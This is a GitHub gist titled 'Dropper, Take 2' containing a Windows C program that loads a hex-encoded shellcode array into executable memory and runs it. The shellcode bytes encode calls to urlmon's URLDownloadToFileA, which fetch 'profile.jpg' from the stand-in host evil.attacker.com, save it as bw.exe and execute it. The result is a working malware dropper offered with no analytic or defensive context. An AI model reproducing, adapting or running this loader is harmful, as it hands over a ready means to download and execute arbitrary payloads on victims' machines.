Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created April 25, 2012 03:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save phikshun/2485895 to your computer and use it in GitHub Desktop.
Save phikshun/2485895 to your computer and use it in GitHub Desktop.
Dropper, Take 2
#define WIN32_LEAN_AND_MEAN
#include "Windows.h"
BYTE shellcode[] =
"\xfc\x89\xe6\x81\xec\x00\x20\x00\x00\xe8\x89\x00\x00\x00\x60\x89"
"\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20"
"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1"
"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"
"\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0"
"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x8d\x85\xe4\x00\x00\x00\x50\x68"
"\x4c\x77\x26\x07\xff\xd5\x89\x06\x8d\x8d\xef\x00\x00\x00\x51\x8b"
"\x16\x52\x68\x49\xf7\x02\x78\xff\xd5\x89\x46\xfc\x31\xc9\x51\xbb"
"\x10\x00\x00\x00\x53\x8d\x95\x02\x01\x00\x00\x52\x8d\x95\x09\x01"
"\x00\x00\x52\x51\xff\x56\xfc\xb9\x01\x00\x00\x00\x51\x8d\x95\x02"
"\x01\x00\x00\x52\x68\x31\x8b\x6f\x87\xff\xd5\x68\xf0\xb5\xa2\x56"
"\xff\xd5\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x55\x52\x4c"
"\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65\x41\x00"
"\x62\x77\x2e\x65\x78\x65\x00\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76"
"\x69\x6c\x2e\x61\x74\x74\x61\x63\x6b\x65\x72\x2e\x63\x6f\x6d\x2f"
"\x70\x72\x6f\x66\x69\x6c\x65\x2e\x6a\x70\x67\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int _tmain(int argc, _TCHAR* argv[]) {
int (*funct)();
funct = (int (*)())VirtualAlloc( NULL, sizeof(shellcode), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
memcpy(funct, &shellcode, sizeof(shellcode));
(int)(*funct)();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment